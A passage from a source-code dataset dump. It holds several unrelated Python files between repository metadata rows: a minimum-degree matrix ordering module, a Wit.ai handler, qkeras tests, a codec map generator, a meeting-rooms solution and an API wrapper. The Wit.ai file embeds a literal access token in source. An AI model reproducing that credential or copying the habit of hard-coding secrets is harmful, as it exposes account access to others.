] | null | null | null | heap_md.py | sorrento/sdopt-tearing | f726e9abbb2d47f93aac32e54949051d3968664b | [
"BSD-3-Clause"
] | null | null | null | # Copyright (C) 2014, 2015 University of Vienna
# All rights reserved.
# BSD license.
# Author: Ali Baharev <ali.baharev@gmail.com>
# Heap-based minimum-degree ordering with NO lookahead.
#
# See also min_degree.py which uses lookahead, and simple_md.py which is a
# hacked version of min_degree.py that still uses repeated linear scans to find
# the minimum degree nodes but does not do lookahead.
from __future__ import print_function
from py3compat import cPickle_loads, cPickle_dumps, cPickle_HIGHEST_PROTOCOL
from itertools import chain
from networkx import max_weight_matching
from pqueue import PriorityQueue as heapdict
from py3compat import irange
from order_util import colp_to_spiked_form, get_hessenberg_order, check_spiked_form,\
coo_matrix_to_bipartite, partial_relabel, argsort, \
get_inverse_perm, get_row_weights
from plot_ordering import plot_hessenberg, plot_bipartite
def hessenberg(rows, cols, values, n_rows, n_cols, tie_breaking):
    '''Permute a sparse matrix (COO arrays) to lower Hessenberg form.

    Tie breaking options: MIN_FIRST, MAX_FIRST, IGNORE. With MIN_FIRST /
    MAX_FIRST the rows are pre-ordered by row weight so ties in the ordering
    are broken deterministically.

    Returns (rowp, colp): the inverse row and column permutations, each a
    permutation of 0..n_rows-1 / 0..n_cols-1.
    '''
    assert tie_breaking in ('IGNORE', 'MIN_FIRST', 'MAX_FIRST'), tie_breaking
    # The col IDs in cols are shifted by n_rows, must undo later
    g, eqs, _ = coo_matrix_to_bipartite(rows, cols, values, (n_rows, n_cols))
    if tie_breaking != 'IGNORE':
        # Relabel the rows such that they are ordered by weight
        row_weights = get_row_weights(g, n_rows)
        reverse = True if tie_breaking == 'MAX_FIRST' else False
        row_pos = argsort(row_weights, reverse)
        mapping = {n: i for i, n in enumerate(row_pos)}
        #
        eqs = set(mapping[eq] for eq in eqs)
        g = partial_relabel(g, mapping)
    #
    rperm, cperm, _, _, _, _ = to_hessenberg_form(g, eqs)
    # Finally, shift the colp such that it is a permutation of 0 .. n_cols-1
    cperm = [c-n_rows for c in cperm]
    # Undo the weight-based relabeling so the permutation refers to the
    # caller's original row indices.
    if tie_breaking != 'IGNORE':
        rperm = [row_pos[r] for r in rperm]
    #
    rowp, colp = get_inverse_perm(rperm, cperm)
    assert sorted(rowp) == list(irange(n_rows))
    assert sorted(colp) == list(irange(n_cols))
    return rowp, colp
################################################################################
#
# TODO Hereafter, rowp and colp here seems to be consistently used for
# rperm and cperm, the permuted row and col identifiers.
#
################################################################################
def to_spiked_form(g, eqs, forbidden=None):
    '''Returns the tuple of: bool singular, [row permutation],
    [column permutation], [spike variables], [residual equations]. The spikes
    and the residuals are ordered according to the permutation.

    NOTE(review): the singularity check below is commented out, so the first
    element of the returned tuple is currently always False, contradicting
    the contract above -- confirm whether the check should be re-enabled.
    NOTE(review): the print() and plot_*() calls look like debugging
    leftovers; they are side effects of every call.
    '''
    # Check singularity, apparently only the permutation to spiked form needs it
    #assert 2*len(eqs) == len(g), 'Not a square matrix!'
    # NOTE(review): newer networkx versions return a set of edge tuples from
    # max_weight_matching instead of a dict -- len() semantics differ; verify
    # against the pinned networkx version.
    matches = max_weight_matching(g)
    print(len(matches))
    #if len(matches) != 2*len(eqs):
    #    return (True, [], [], [], [])
    if forbidden is None:
        forbidden = set()
    rowp, colp_hess, matches, tear_set, sink_set = min_degree(g, eqs, forbidden)
    print('ok')
    colp = colp_to_spiked_form(rowp, colp_hess, matches, tear_set, sink_set)
    #check_spiked_form(g, rowp, colp, tear_set)
    plot_hessenberg(g, rowp, colp_hess, [], '')
    plot_bipartite(g, forbidden, rowp, colp)
    # Keep only tears/sinks, ordered by the permutation.
    tears = [c for c in colp if c in tear_set]
    sinks = [r for r in rowp if r in sink_set]
    return (False, rowp, colp, tears, sinks)
def to_hessenberg_form(g, eqs, forbidden=None):
    '''Order the bipartite graph into lower Hessenberg form.

    Returns the tuple of: [row permutation], [column permutation],
    [guessed variables], [residual equations], [row matches], [col matches],
    each ordered according to the permutation.'''
    rowp, colp, matches, tear_set, sink_set = min_degree(g, eqs, forbidden)

    def in_perm_order(perm, members):
        # Keep only the nodes in `members`, preserving permutation order.
        return [n for n in perm if n in members]

    tears = in_perm_order(colp, tear_set)
    sinks = in_perm_order(rowp, sink_set)
    row_matches = in_perm_order(rowp, matches)
    col_matches = in_perm_order(colp, matches)
    return (rowp, colp, tears, sinks, row_matches, col_matches)
def min_degree(g_orig, eqs, forbidden=None):
    '''Heap-based minimum-degree ordering with no lookahead.

    Returns: tuple([row permutation], [column permutation],
    {eq: var and var: eq matches}, set(tear vars), set(residual equations)).

    g_orig is a bipartite equation/variable graph; eqs is the set of
    equation nodes; forbidden is an optional set of (eq, var) edges that must
    not be matched. g_orig is not mutated (copies are made in setup_graphs).
    '''
    # Duplicated in bb_tear.initial_solution with none forbidden
    assert eqs
    if forbidden is None:
        forbidden = set()
    if not isinstance(eqs, (set, dict)):
        eqs = set(eqs)  # Make sure that `n in eqs` will be O(1).
    g_allowed, g = setup_graphs(g_orig, forbidden)
    eq_tot = create_heap(g_allowed, g, eqs)
    rowp, matches = [ ], { }
    # Greedy loop: repeatedly pop the cheapest equation, match it to one of
    # its allowed variables (if any), then eliminate the equation and all of
    # its variables from both working graphs.
    while eq_tot:
        (_cost, _tot, _eq), eq = eq_tot.popitem()
        #assert _eq == eq, (_eq, eq)
        #print('Eq:', eq)
        rowp.append(eq)
        if g_allowed[eq]:
            # Deterministic choice: smallest allowed variable label.
            var = sorted(g_allowed[eq])[0] # or [-1] for last
            assert eq not in matches
            assert var not in matches
            matches[eq] = var
            matches[var] = eq
            #print('Var:', var)
        vrs = sorted(g[eq])
        # Equations that share a variable with eq need their priority updated.
        eqs_update = set(chain.from_iterable(g[v] for v in vrs))
        eqs_update.discard(eq)
        g_allowed.remove_node(eq)
        g.remove_node(eq)
        g_allowed.remove_nodes_from(vrs)
        g.remove_nodes_from(vrs)
        for e in sorted(eqs_update):  # keep in sync with create_heap
            tot = len(g[e])
            cost = tot-1 if g_allowed[e] else tot
            eq_tot[e] = (cost, tot, e)
    assert len(rowp) == len(eqs)
    # The row permutation determines the column permutation, let's get it!
    # get_hessenberg_order also asserts non-increasing envelope, among others
    colp = get_hessenberg_order(g_orig, eqs, rowp)
    # Unmatched equations are residuals (sinks); unmatched columns are tears.
    sink_set = { n for n in rowp if n not in matches }
    tear_set = { n for n in colp if n not in matches }
    #
    #print('Number of tears:', len(tear_set))
    #print('Row permutation:', rowp)
    #print('Col permutation:', colp)
    #
    return rowp, colp, matches, tear_set, sink_set
def setup_graphs(g_orig, forbidden):
    """Return ``(g_allowed, g)``: two independent copies of *g_orig*, where
    ``g_allowed`` additionally has every *forbidden* ``(u, v)`` edge removed.

    Copies are made via a pickle round-trip so the caller's graph is never
    mutated.
    """
    g_pkl = cPickle_dumps(g_orig, cPickle_HIGHEST_PROTOCOL)
    g = cPickle_loads(g_pkl)
    g_allowed = cPickle_loads(g_pkl)
    # (A dead local `adj = g_allowed.adj` and stale commented-out adjacency
    # manipulation were removed; remove_edge is the supported API.)
    for u, v in forbidden:
        g_allowed.remove_edge(u, v)
    return g_allowed, g
def create_heap(g_allowed, g, eqs):
    """Build the equation priority queue keyed by (cost, degree, eq)."""
    heap = heapdict()
    for eq in sorted(eqs):
        degree = len(g[eq])
        # An equation that still has an allowed (matchable) edge is one
        # unit cheaper, so it is preferred at equal degree.
        heap[eq] = (degree - 1 if g_allowed[eq] else degree, degree, eq)
    return heap
def run_tests():
    """Print the ordering results for every generated test problem."""
    from test_tearing import gen_testproblems
    labels = ('Rowp:', 'Colp:', 'Tears:', 'Residuals:', 'mr:', 'mc:')
    for g, eqs, forbidden in gen_testproblems():
        results = to_hessenberg_form(g, eqs, forbidden)
        for label, value in zip(labels, results):
            print(label, value)


if __name__=='__main__':
    run_tests()
| 37.671875 | 85 | 0.632103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,503 | 0.346053 |
5e1c13b5fde8efced653749af34695c0b5d9ba5a | 498 | py | Python | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 1 | 2020-11-25T12:01:31.000Z | 2020-11-25T12:01:31.000Z | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 6 | 2020-08-31T12:12:53.000Z | 2020-10-01T13:00:44.000Z | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 1 | 2020-08-31T15:31:37.000Z | 2020-08-31T15:31:37.000Z | import json
from wit import Wit
# NOTE(review): hard-coded Wit.ai server access token committed to source;
# it should be rotated and loaded from an environment variable / secret store.
access_token = "2PLFUWBVVTYQCSEL6VDJ3AFQLUCTV7ZH"
# Module-level Wit client shared by the handler below.
client = Wit(access_token=access_token)
def wit_handler(event, context):
    """Lambda-style handler: send an utterance to Wit.ai and return the top
    intent and the entity list in a JSON response body.

    NOTE(review): the utterance is hard-coded for testing; presumably it
    should be taken from ``event`` -- confirm with the caller.
    """
    utterance = 'good morning john'
    response = client.message(msg=utterance)
    intent = None
    entity = None
    try:
        intent = list(response['intents'])[0]
        entity = list(response['entities'])
    except (KeyError, IndexError, TypeError):
        # Missing or empty 'intents'/'entities' -> leave both as None.
        pass
    return {
        'statusCode': 200,
        # Bug fix: json.dumps(intent, entity) always raised TypeError because
        # dumps() accepts a single positional argument; serialize both values
        # in one JSON object instead.
        'body': json.dumps({'intent': intent, 'entity': entity})
    }
| 19.153846 | 49 | 0.63253 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 90 | 0.180723 |
5e1c80a3d2808f3e17cc61a45407995b0eca85e2 | 1,674 | py | Python | py/server/tests/test_plot/test_color.py | mattrunyon/deephaven-core | 80e3567e4647ab76a81e483d0a8ab542f9aadace | [
"MIT"
] | null | null | null | py/server/tests/test_plot/test_color.py | mattrunyon/deephaven-core | 80e3567e4647ab76a81e483d0a8ab542f9aadace | [
"MIT"
] | null | null | null | py/server/tests/test_plot/test_color.py | mattrunyon/deephaven-core | 80e3567e4647ab76a81e483d0a8ab542f9aadace | [
"MIT"
] | null | null | null | #
# Copyright (c) 2016-2022 Deephaven Data Labs and Patent Pending
#
import unittest
from deephaven import read_csv, DHError
from deephaven.plot import Color, Colors
from deephaven.plot import Figure
from deephaven.plot import LineEndStyle, LineStyle
from tests.testbase import BaseTestCase
class ColorTestCase(BaseTestCase):
    """Tests for the deephaven.plot Color/Colors factories and their use as
    line colors on a Figure."""

    def setUp(self):
        # Shared input table for the plotting tests.
        self.test_table = read_csv("tests/data/test_table.csv")

    def tearDown(self) -> None:
        self.test_table = None

    def test_color(self):
        # A predefined color from the Colors palette can style a plot line.
        figure = Figure()
        new_f = figure.plot_xy("plot1", self.test_table, x="a", y="b")
        line = new_f.line(color=Colors.RED, style=LineStyle(width=1.0, end_style=LineEndStyle.ROUND))
        self.assertIsNotNone(line)

    def test_color_hsl(self):
        # A custom HSL color with alpha can style a plot line.
        figure = Figure()
        custom_color = Color.of_hsl(h=128, s=58, l=68, alpha=0.6)
        new_f = figure.plot_xy("plot1", self.test_table, x="a", y="b")
        line = new_f.line(color=custom_color, style=LineStyle(width=1.0, end_style=LineEndStyle.ROUND))
        self.assertIsNotNone(line)

    def test_color_factory(self):
        # Valid factory inputs must not raise...
        Color.of_name("RED")
        Color.of_rgb(12, 16, 188, 200)
        Color.of_rgb_f(0.2, 0.6, 0.88, alpha=0.2)
        Color.of_hsl(h=128, s=58, l=68, alpha=0.6)
        # ...while out-of-range / unknown inputs must raise DHError.
        with self.assertRaises(DHError):
            Color.of_name("REDDER")
        with self.assertRaises(DHError):
            Color.of_rgb(12, 16, 288)
        with self.assertRaises(DHError):
            Color.of_rgb_f(1.2, 0.6, 0.88, alpha=0.2)
        with self.assertRaises(DHError):
            Color.of_hsl(h=377, s=58, l=168, alpha=10)


if __name__ == '__main__':
    unittest.main()
| 33.48 | 103 | 0.651732 | 1,328 | 0.793309 | 0 | 0 | 0 | 0 | 0 | 0 | 144 | 0.086022 |
5e1d9ee77b00022f4700b24ef8893c1143b97d6b | 6,199 | py | Python | Tools/unicode/genmap_support.py | shawwn/cpython | 0ff8a3b374286d2218fc18f47556a5ace202dad3 | [
"0BSD"
] | 52,316 | 2015-01-01T15:56:25.000Z | 2022-03-31T23:19:01.000Z | Tools/unicode/genmap_support.py | shawwn/cpython | 0ff8a3b374286d2218fc18f47556a5ace202dad3 | [
"0BSD"
] | 25,286 | 2015-03-03T23:18:02.000Z | 2022-03-31T23:17:27.000Z | Tools/unicode/genmap_support.py | shawwn/cpython | 0ff8a3b374286d2218fc18f47556a5ace202dad3 | [
"0BSD"
] | 31,623 | 2015-01-01T13:29:37.000Z | 2022-03-31T19:55:06.000Z | #
# genmap_support.py: Multibyte Codec Map Generator
#
# Original Author: Hye-Shik Chang <perky@FreeBSD.org>
# Modified Author: Dong-hee Na <donghee.na92@gmail.com>
#
class BufferedFiller:
    """Accumulate short tokens and emit them as lines at most *column* wide."""

    def __init__(self, column=78):
        self.column = column      # maximum width of an output line
        self.buffered = []        # completed lines, waiting for printout()
        self.cline = []           # tokens of the line currently being filled
        self.clen = 0             # width of the current line so far
        self.count = 0            # total number of tokens ever written

    def write(self, *data):
        """Append tokens, starting a new line whenever one would overflow."""
        for token in data:
            width = len(token)
            if width > self.column:
                raise ValueError("token is too long")
            if self.clen + width > self.column:
                self.flush()
            self.cline.append(token)
            self.clen += width
            self.count += 1

    def flush(self):
        """Move the in-progress line (if any) into the buffered output."""
        if self.cline:
            self.buffered.append(''.join(self.cline))
            del self.cline[:]
            self.clen = 0

    def printout(self, fp):
        """Write all buffered lines to *fp*, then clear the buffer."""
        self.flush()
        for line in self.buffered:
            fp.write(line + '\n')
        del self.buffered[:]

    def __len__(self):
        """Number of tokens written so far (not reset by printout())."""
        return self.count
class DecodeMapWriter:
    """Emit the C decode tables (value array + 256-entry index) for a
    multibyte codec, given a {lead_byte: {trail_byte: unicode}} decode map."""

    filler_class = BufferedFiller

    def __init__(self, fp, prefix, decode_map):
        self.fp = fp                  # output file-like object (C source)
        self.prefix = prefix          # codec name used in the C identifiers
        self.decode_map = decode_map  # {c1: {c2: codepoint, ...}, ...}
        self.filler = self.filler_class()

    def update_decode_map(self, c1range, c2range, onlymask=(), wide=0):
        """Fill the token buffer for lead bytes in c1range (inclusive) and
        trail bytes in c2range, recording min/max/midx bookkeeping keys into
        each per-lead-byte sub-map. Gaps are emitted as the 'U,' sentinel."""
        c2values = range(c2range[0], c2range[1] + 1)
        for c1 in range(c1range[0], c1range[1] + 1):
            if c1 not in self.decode_map or (onlymask and c1 not in onlymask):
                continue
            c2map = self.decode_map[c1]
            rc2values = [n for n in c2values if n in c2map]
            if not rc2values:
                continue
            # Bookkeeping keys live next to the int trail-byte keys; generate()
            # later tests `self.prefix in self.decode_map[i]`.
            c2map[self.prefix] = True
            c2map['min'] = rc2values[0]
            c2map['max'] = rc2values[-1]
            c2map['midx'] = len(self.filler)  # offset into __<prefix>_decmap
            for v in range(rc2values[0], rc2values[-1] + 1):
                if v in c2map:
                    self.filler.write('%d,' % c2map[v])
                else:
                    self.filler.write('U,')  # undefined slot sentinel

    def generate(self, wide=False):
        """Write the value array (ucs2_t or Py_UCS4 when wide) and the
        256-entry dbcs_index/widedbcs_index table to the output file."""
        if not wide:
            self.fp.write(f"static const ucs2_t __{self.prefix}_decmap[{len(self.filler)}] = {{\n")
        else:
            self.fp.write(f"static const Py_UCS4 __{self.prefix}_decmap[{len(self.filler)}] = {{\n")
        self.filler.printout(self.fp)
        self.fp.write("};\n\n")
        if not wide:
            self.fp.write(f"static const struct dbcs_index {self.prefix}_decmap[256] = {{\n")
        else:
            self.fp.write(f"static const struct widedbcs_index {self.prefix}_decmap[256] = {{\n")
        for i in range(256):
            # Lead bytes never touched by update_decode_map get a null entry.
            if i in self.decode_map and self.prefix in self.decode_map[i]:
                m = self.decode_map
                prefix = self.prefix
            else:
                self.filler.write("{", "0,", "0,", "0", "},")
                continue
            self.filler.write("{", "__%s_decmap" % prefix, "+", "%d" % m[i]['midx'],
                              ",", "%d," % m[i]['min'], "%d" % m[i]['max'], "},")
        self.filler.printout(self.fp)
        self.fp.write("};\n\n")
class EncodeMapWriter:
    """Emit the C encode tables (value array + 256-entry unim_index) for a
    multibyte codec, given a {c1: {c2: value}} encode map."""

    filler_class = BufferedFiller
    elemtype = 'DBCHAR'               # C element type of the value array
    indextype = 'struct unim_index'   # C type of the 256-entry index table

    def __init__(self, fp, prefix, encode_map):
        self.fp = fp                  # output file-like object (C source)
        self.prefix = prefix          # codec name used in the C identifiers
        self.encode_map = encode_map
        self.filler = self.filler_class()

    def generate(self):
        """Build the token buffer, then write both C tables."""
        self.buildmap()
        self.printmap()

    def buildmap(self):
        """Fill the token buffer and record min/max/midx bookkeeping keys in
        each sub-map.

        NOTE(review): rc2values is taken from *all* current keys; calling
        buildmap() twice on the same map would pick up the string bookkeeping
        keys added on the first pass and fail in sort() -- assumed one-shot.
        """
        for c1 in range(0, 256):
            if c1 not in self.encode_map:
                continue
            c2map = self.encode_map[c1]
            rc2values = [k for k in c2map.keys()]
            rc2values.sort()
            if not rc2values:
                continue
            c2map[self.prefix] = True
            c2map['min'] = rc2values[0]
            c2map['max'] = rc2values[-1]
            c2map['midx'] = len(self.filler)  # offset into __<prefix>_encmap
            for v in range(rc2values[0], rc2values[-1] + 1):
                if v not in c2map:
                    self.write_nochar()
                elif isinstance(c2map[v], int):
                    self.write_char(c2map[v])
                elif isinstance(c2map[v], tuple):
                    self.write_multic(c2map[v])
                else:
                    raise ValueError

    def write_nochar(self):
        # 'N' sentinel: no character at this slot.
        self.filler.write('N,')

    def write_multic(self, point):
        # 'M' sentinel: multi-character mapping (the tuple itself is emitted
        # elsewhere by subclasses; `point` is intentionally unused here).
        self.filler.write('M,')

    def write_char(self, point):
        self.filler.write(str(point) + ',')

    def printmap(self):
        """Write the value array and the 256-entry index table to the file."""
        self.fp.write(f"static const {self.elemtype} __{self.prefix}_encmap[{len(self.filler)}] = {{\n")
        self.filler.printout(self.fp)
        self.fp.write("};\n\n")
        self.fp.write(f"static const {self.indextype} {self.prefix}_encmap[256] = {{\n")
        for i in range(256):
            if i in self.encode_map and self.prefix in self.encode_map[i]:
                self.filler.write("{", "__%s_encmap" % self.prefix, "+",
                                  "%d" % self.encode_map[i]['midx'], ",",
                                  "%d," % self.encode_map[i]['min'],
                                  "%d" % self.encode_map[i]['max'], "},")
            else:
                # Untouched first bytes get a null entry.
                self.filler.write("{", "0,", "0,", "0", "},")
                continue
        self.filler.printout(self.fp)
        self.fp.write("};\n\n")
def open_mapping_file(path, source):
    """Open the mapping file at *path* for reading; abort the program with a
    message naming *source* (the file the user must supply) if it is missing."""
    try:
        return open(path)
    except IOError:
        raise SystemExit(f'{source} is needed')
def print_autogen(fo, source):
    """Write the standard do-not-edit banner for a generated C file to *fo*,
    naming *source* as the file it was generated from."""
    fo.write('// AUTO-GENERATED FILE FROM %s: DO NOT EDIT\n' % (source,))
def loadmap(fo, natcol=0, unicol=1, sbcs=0):
    """Parse a whitespace-separated mapping file into a nested decode map.

    Each data line yields native (column *natcol*) and Unicode (column
    *unicol*) values; '#' starts a comment. Single-byte codes (< 0x100) are
    kept only when *sbcs* is true. Returns {lead_byte: {trail_byte: uni}}.
    """
    print("Loading from", fo)
    fo.seek(0, 0)
    mapping = {}
    for raw in fo:
        text = raw.split('#', 1)[0].strip()
        fields = text.split()
        if len(fields) < 2:
            continue
        # NOTE: eval() on file content -- the mapping files are trusted
        # build inputs (tokens like 0x8140), not user data.
        values = [eval(tok) for tok in fields]
        native, uni = values[natcol], values[unicol]
        if native >= 0x100 or sbcs:
            mapping.setdefault(native >> 8, {})[native & 0xff] = uni
    return mapping
| 31.150754 | 104 | 0.515728 | 5,284 | 0.852396 | 0 | 0 | 0 | 0 | 0 | 0 | 968 | 0.156154 |
5e1f0f8430d2f116abcaa857baa9397fb525b5b9 | 3,487 | py | Python | tests/qlayers_test.py | kshithijiyer/qkeras | 78ac608c6dcd84151792a986d03fe7afb17929cf | [
"Apache-2.0"
] | 388 | 2019-08-06T22:16:48.000Z | 2022-03-30T17:17:47.000Z | tests/qlayers_test.py | kshithijiyer/qkeras | 78ac608c6dcd84151792a986d03fe7afb17929cf | [
"Apache-2.0"
] | 76 | 2019-08-21T19:25:58.000Z | 2022-03-31T09:07:07.000Z | tests/qlayers_test.py | kshithijiyer/qkeras | 78ac608c6dcd84151792a986d03fe7afb17929cf | [
"Apache-2.0"
] | 79 | 2019-08-15T03:00:02.000Z | 2022-03-31T09:05:11.000Z | # Copyright 2019 Google LLC
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test layers from qlayers.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.testing import assert_allclose
import pytest
import logging
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Input
from tensorflow.keras.models import Model
from tensorflow.keras.backend import clear_session
from qkeras import QActivation
from qkeras import QDense
from qkeras import quantized_bits
from qkeras.utils import model_save_quantized_weights
from qkeras.utils import quantized_model_from_json
def qdense_util(layer_cls,
                kwargs=None,
                input_data=None,
                weight_data=None,
                expected_output=None):
  """Build a one-layer Keras model and check its prediction.

  Instantiates ``layer_cls`` with ``kwargs``, connects it to an ``Input``
  shaped like ``input_data``, loads ``weight_data`` into the layer, and,
  when ``expected_output`` is provided, asserts that the model prediction
  matches it within a relative tolerance of 1e-4.
  """
  layer = layer_cls(**kwargs)
  inputs = Input(shape=input_data.shape[1:], dtype=input_data.dtype)
  outputs = layer(inputs)
  # Weights can only be set after the layer has been built by the call above.
  layer.set_weights(weight_data)
  model = Model(inputs, outputs)
  prediction = model.predict(input_data)
  if expected_output is not None:
    assert_allclose(prediction, expected_output, rtol=1e-4)
@pytest.mark.parametrize(
    'layer_kwargs, input_data, weight_data, bias_data, expected_output',
    [
        # Case 1: unquantized QDense -- behaves like a plain Dense layer,
        # so four inputs of 1 against weight columns of 10s and 20s yield
        # the exact dot product [40, 80].
        (
            {
                'units': 2,
                'use_bias': True,
                'kernel_initializer': 'glorot_uniform',
                'bias_initializer': 'zeros'
            },
            np.array([[1, 1, 1, 1]], dtype=K.floatx()),
            np.array([[10, 20], [10, 20], [10, 20], [10, 20]],
                     dtype=K.floatx()),  # weight_data
            np.array([0, 0], dtype=K.floatx()),  # bias
            np.array([[40, 80]], dtype=K.floatx())),  # expected_output
        # Case 2: 2-bit kernel/bias quantizers -- the large weights are
        # clipped by quantized_bits(2,0,alpha=1.0); presumably each weight
        # saturates to 0.5 so the four unit inputs sum to 2 per output
        # (TODO confirm against the quantized_bits definition).
        (
            {
                'units': 2,
                'use_bias': True,
                'kernel_initializer': 'glorot_uniform',
                'bias_initializer': 'zeros',
                'kernel_quantizer': 'quantized_bits(2,0,alpha=1.0)',
                'bias_quantizer': 'quantized_bits(2,0)',
            },
            np.array([[1, 1, 1, 1]], dtype=K.floatx()),
            np.array([[10, 20], [10, 20], [10, 20], [10, 20]],
                     dtype=K.floatx()),  # weight_data
            np.array([0, 0], dtype=K.floatx()),  # bias
            np.array([[2, 2]], dtype=K.floatx())),  # expected_output
    ])
def test_qdense(layer_kwargs, input_data, weight_data, bias_data,
                expected_output):
  """Check QDense predictions with and without weight/bias quantizers."""
  qdense_util(
      layer_cls=QDense,
      kwargs=layer_kwargs,
      input_data=input_data,
      weight_data=[weight_data, bias_data],
      expected_output=expected_output)
# Allow running this test module directly, outside a pytest invocation.
if __name__ == '__main__':
  pytest.main([__file__])
| 35.581633 | 80 | 0.62776 | 0 | 0 | 0 | 0 | 1,519 | 0.435618 | 0 | 0 | 1,092 | 0.313163 |
5e1f5b28440e3916c2f562221a0e73e7f0243f14 | 1,031 | py | Python | 253/meetingroomII.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | 253/meetingroomII.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | 253/meetingroomII.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | """
timecompliexty = O(nlog(n))
separate start and end time into two list
sort each of them
use s,e represent start and end index from 0
iterate start time list by while loop
compare start[s] end[e]
if start >= end means after cur meeting finish another one can use the meeting room ,no need to add a new room
else means before current meeting finish another one need to use room so need add a new one
move two index s,e by compare and add num of meeting when a new room is needed
"""
from typing import List
class Solution:
    def minMeetingRooms(self, intervals: List[List[int]]) -> int:
        """Return the minimum number of rooms needed to host all meetings.

        Two-pointer sweep over the independently sorted start and end
        times: each start that precedes the earliest unmatched end needs
        a fresh room; otherwise a previously used room is recycled.
        """
        starts = sorted(interval[0] for interval in intervals)
        ends = sorted(interval[1] for interval in intervals)
        rooms = 0
        end_idx = 0
        for begin in starts:
            if begin >= ends[end_idx]:
                # The earliest-finishing meeting is over; reuse its room.
                end_idx += 1
            else:
                # Overlap with every meeting still running: open a new room.
                rooms += 1
        return rooms
# Manual smoke test: [1,13] and [13,15] do not overlap (a meeting ending
# at 13 frees its room for one starting at 13), so this prints 1.
A = Solution()
intervals = [[13,15],[1,13]]
print(A.minMeetingRooms(intervals))
5e1f786401704260570a0a2ec7e2d5a110efb0fc | 3,528 | py | Python | uiza/api_resources/entity/entity.py | uizaio/api-wrapper-python | e67c162e711857341f7ef5752178219e94f604d3 | [
"MIT"
] | 2 | 2019-04-22T11:39:36.000Z | 2020-05-26T04:01:43.000Z | uiza/api_resources/entity/entity.py | uizaio/api-wrapper-python | e67c162e711857341f7ef5752178219e94f604d3 | [
"MIT"
] | null | null | null | uiza/api_resources/entity/entity.py | uizaio/api-wrapper-python | e67c162e711857341f7ef5752178219e94f604d3 | [
"MIT"
] | 2 | 2019-02-11T09:34:03.000Z | 2019-02-12T10:31:41.000Z | import uiza
from uiza import Connection
from uiza.api_resources.base.base import UizaBase
from uiza.settings.config import settings
from uiza.utility.utility import set_url
class Entity(UizaBase):
    """REST wrapper for the Uiza ``entity`` endpoints.

    Builds a :py:class:`uiza.Connection` from the module-level
    ``uiza.workspace_api_domain`` / ``uiza.authorization`` settings and
    points it at the entity API; every method issues one HTTP request
    and returns the raw response data.
    """

    def __init__(self):
        # Credentials come from module-level configuration set by the caller.
        self.connection = Connection(workspace_api_domain=uiza.workspace_api_domain, api_key=uiza.authorization)
        self.connection.url = set_url(
            workspace_api_domain=self.connection.workspace_api_domain,
            api_type=settings.uiza_api.entity.type,
            api_version=settings.uiza_api.entity.version,
            api_sub_url=settings.uiza_api.entity.sub_url
        )
    def search(self, keyword):
        """
        Search entity base on keyword entered.

        :param keyword: keyword for search entity
        :return: response data from GET <entity>/search
        """
        self.connection.url = '{}/search'.format(self.connection.url)
        params = dict(keyword=keyword, appId=uiza.app_id)
        query = self.url_encode(params=params)
        data = self.connection.get(query=query)
        return data
    def generate_iframe(self, entityId, api):
        """
        Generate iframe entity base on keyword entered.

        :param entityId: id of entity
        :param api: api iframe
        :return: response data from GET <entity>/iframe
        """
        self.connection.url = '{}/iframe'.format(self.connection.url)
        params = dict(entityId=entityId, api=api, appId=uiza.app_id)
        query = self.url_encode(params=params)
        data = self.connection.get(query=query)
        return data
    def publish(self, id):
        """
        Publish entity to CDN, use for streaming.

        :param id: identifier of entity
        :return: response data from POST <entity>/publish
        """
        self.connection.url = '{}/publish'.format(self.connection.url)
        data = self.connection.post(data={'id': id, 'appId': uiza.app_id})
        return data
    def get_status_publish(self, id):
        """
        Get status publish entity.

        :param id: identifier of entity
        :return: response data from GET <entity>/publish/status
        """
        self.connection.url = '{}/publish/status'.format(self.connection.url)
        query = self.url_encode(params={'id': id, 'appId': uiza.app_id})
        data = self.connection.get(query=query)
        return data
    def get_media_tracking(self, **kwargs):
        """
        Get media tracking.

        :param kwargs: optional filters merged into the query string
            (e.g. ``progress`` of the entity)
        :return: response data from GET <entity>/tracking
        """
        self.connection.url = '{}/tracking'.format(self.connection.url)
        params = dict(appId=uiza.app_id)
        if kwargs:
            params.update(kwargs)
        query = self.url_encode(params=params)
        data = self.connection.get(query=query)
        return data
    def get_media_upload_detail(self, id):
        """
        Get media upload detail.

        :param id: identifier of entity
        :return: response data from GET <entity>/tracking
        """
        # NOTE(review): this hits the same '/tracking' endpoint as
        # get_media_tracking -- confirm the sub-URL is intentional.
        self.connection.url = '{}/tracking'.format(self.connection.url)
        query = self.url_encode(params={'id': id, 'appId': uiza.app_id})
        data = self.connection.get(query=query)
        return data
    def get_aws_upload_key(self):
        """
        Return the bucket temporary upload storage & key for upload.

        Rebuilds the connection URL to the admin AWS-config endpoint
        before issuing the request.
        """
        aws_sub_url = 'admin/app/config/aws'
        self.connection.url = set_url(
            workspace_api_domain=self.connection.workspace_api_domain,
            api_type=settings.uiza_api.entity.type,
            api_version=settings.uiza_api.entity.version,
            api_sub_url=aws_sub_url
        )
        query = self.url_encode(params={'appId': uiza.app_id})
        data = self.connection.get(query=query)
        return data
